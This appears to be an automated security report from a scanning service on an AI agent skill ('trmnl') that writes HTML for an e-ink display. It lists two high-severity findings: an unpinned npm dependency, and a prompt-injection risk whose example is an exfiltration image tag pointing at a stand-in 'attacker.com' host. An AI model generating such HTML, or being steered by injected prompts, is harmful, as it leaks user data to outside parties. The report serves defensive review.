Trust Assessment
trmnl received a trust score of 74/100, placing it in the Caution category. This skill has some security considerations that users should review before deployment.
SkillShield's automated analysis identified 2 findings: 0 critical, 2 high, 0 medium, and 0 low severity. Key findings include Unpinned `trmnl-cli` dependency, LLM-generated HTML content can be exploited via prompt injection.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. All layers scored 70 or above, reflecting consistent security practices.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings2
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Unpinned `trmnl-cli` dependency The skill instructs the agent to install `trmnl-cli@latest` globally. Using `@latest` means that any new version, including potentially malicious ones, could be installed without explicit review. This poses a significant supply chain risk, as a compromised version of the `trmnl-cli` package could lead to arbitrary code execution or data exfiltration on the host system. Pin the `trmnl-cli` dependency to a specific, known-good version (e.g., `npm install -g trmnl-cli@1.2.3`) to prevent automatic updates to potentially compromised versions. Regularly review and update the pinned version after verifying its integrity. | LLM | SKILL.md:10 | |
| HIGH | LLM-generated HTML content can be exploited via prompt injection The skill instructs the LLM to generate HTML content based on user input, which is then written to `/tmp/trmnl-content.html` and processed by the `trmnl` CLI. A malicious user could craft a prompt to manipulate the LLM into generating HTML that includes arbitrary JavaScript, external resource fetches (e.g., `<img src="http://attacker.com/leak?data=...">`), or other malicious constructs. If the `trmnl` CLI or the e-ink display device processes this HTML without sufficient sanitization (e.g., if the CLI has a preview function that renders HTML in a browser, or if the device fetches external resources), this could lead to data exfiltration (e.g., IP address, user agent, or other accessible data) or, in a worst-case scenario, command injection if the HTML parser is vulnerable. While the skill instructs to use "TRMNL framework classes", prompt injection can bypass such constraints. 1. **Strict Input Validation/Sanitization**: Implement robust sanitization of all LLM-generated HTML content before writing it to a file or passing it to the `trmnl` CLI. This should strip out `<script>` tags, `on*` attributes, and validate URLs in `src`/`href` attributes against a whitelist. 2. **Confine LLM Output**: Use stronger prompt engineering techniques (e.g., few-shot examples, XML/JSON output constraints) to strictly limit the LLM's output to only the allowed TRMNL framework classes and attributes, preventing it from generating arbitrary HTML. 3. **Sandbox Execution**: If the `trmnl` CLI or device renders HTML in a browser-like environment, ensure it's heavily sandboxed to prevent script execution, network access, or local file access. 4. **Least Privilege**: Ensure the `trmnl` CLI runs with the minimum necessary permissions. | LLM | SKILL.md:33 |
Scan History
Embed Code
[](https://skillshield.io/report/6423b4961a20bda7)
Powered by SkillShield